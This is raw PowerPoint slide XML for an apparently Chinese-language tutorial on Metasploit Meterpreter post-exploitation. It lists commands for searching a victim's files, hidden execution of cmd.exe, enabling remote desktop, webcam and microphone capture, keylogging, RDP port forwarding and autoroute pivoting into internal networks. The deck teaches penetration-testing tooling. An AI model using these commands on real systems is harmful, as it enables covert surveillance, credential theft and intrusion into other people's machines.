              <a:t>一样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 err="1"/>
              <a:t>getwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>打印工作目录  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>pwd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cd#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>更改本地目录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ls#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>列出在当前目录中的文件列表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6009" y="822117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高级扫描方式：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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76770" y="2059536"/>
            <a:ext cx="10537380" cy="422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①msf&gt; use auxiliary/scanner/ip/ipidseq #IPID序列扫描器，与 nmap的-sI -O选项类似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showoptions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 RPORT8080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（ RHOSTS、 RPORT等参数也可以用小写）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基本操作命令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000" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>输出工作目录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>cd c:\\ #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>进入目录文件下 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>cd c:/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> file #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>删除文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>mkdir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dier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>在受害者系统上的创建目录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>rmdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>受害者系统上删除目录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>列出目标主机的文件和文件夹信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>exit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>文件名称  进行创建文件或者编辑文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>mv#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>修改目标主机上的文件名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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search -d c:/Users/admin/ -f *.php    -d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> 路径</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>文件类型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>search -d d:\\www -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>web.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> #search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>文件，如</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>search  -d c:\\  -f *.doc   -d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> 路径</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>文件类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>vnc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>查看桌面 就是在受害者主机安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>vnc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，然后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>这边调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1296365"/>
            <a:ext cx="10828655" cy="4518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run  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>getgui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>  -e   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>开启目标主机远程桌面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err="1"/>
              <a:t>rdesktop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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>连接受害者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err="1"/>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>命令为显示远程主机的系统信息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execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>执行程序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execute  -f notepad.exe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execute -h  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>显示帮助信息。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>为执行要运行的命令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如果希望隐藏后台执行，加参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-H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execute  -H -f notepad.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>我们运行目标主机上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>程序，并以隐藏的方式直接交互到我们的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>会话上</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>execute  -H -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-f  cmd.exe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摄像头命令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record_mic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>　　　 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>音频录制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webcam_chat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看摄像头接口 安卓手机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webcam_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>　　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看摄像头列表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webcam_stream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>摄像头视频获取</a:t>
            </a:r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311" y="197589"/>
            <a:ext cx="8354695" cy="640080"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口转发 用的比较多、服务器在内网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815" y="837669"/>
            <a:ext cx="11111696" cy="5621004"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>portfwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> -h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>用法：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>portfwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> [-h] [add | delete | list | flush] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>选项：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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-L &lt;opt&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>要监听的本地主机（可选）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-h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>帮助横幅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-l &lt;opt&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>要监听的本地端口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-p &lt;opt&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>连接到的远程端口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-r &lt;opt&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>要连接到的远程主机</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>portfwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>  add -l 4444 -p 3389 -r 192.168.1.102 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>端口转发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>本机监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>4444,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>把目标机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>3389</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>转到本机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>4444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通过将远程主机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3389</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>转发到本地的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，这样监听本地的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>就能够远程连接主机了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 err="1"/>
              <a:t>rdesktop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> -u Administrator -p bk#123 127.0.0.1:4444 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>rdesktop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>来连接桌面，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>用户名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>密码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>rdesktop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> 127.1.1.0:4444 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>需要输入用户名和密码远程连接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057" y="313336"/>
            <a:ext cx="8354695" cy="640080"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络环境 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进入内网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711" y="953417"/>
            <a:ext cx="10717024" cy="486159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就是拿到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的主机位于内网中，将该主机作为跳板 先略过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 err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&gt; route</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>命令   显示目标主机上的主机路由表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&gt;run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>get_local_subnets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>   --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>查看该主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>已经在内网中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>还有哪些网络能够访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>将其设置为路由器   后面会详细讲</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>添加一条通向目标服务器内网的路由</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>下面就是讲拿到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的主机当做是一个路由器，转发内网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(100.0.0.0/8)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>流量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&gt;run autoroute -s 100.0.0.0/8   #(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>根据目标内网网络而定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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>查看路由设置：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&gt;run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>autoroute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> –p</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>一般来说，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>中设置路由便可以达到通往其内网的目的。然而有些时候还是会失败，这时我们可以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返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，查看下外面的路由情况</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>route print</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>如果发现没有路由信息，说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>设置的路由并没有生效，我们可以在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>中添加路由。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&gt;route add 10.0.0.0 255.0.0.0 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>说明：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>session 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，攻击机如果要去访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>10.0.0.0/8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>网段的资源，其下一跳是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>session1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，至于什么是下一条这里不多说了，反正就是目前攻击机可以访问内网资源了。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键盘记录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1018573"/>
            <a:ext cx="10828655" cy="4796438"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>keyscan_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：开启键盘记录功能 那边敲 这边通过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 err="1"/>
              <a:t>keyscan_dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
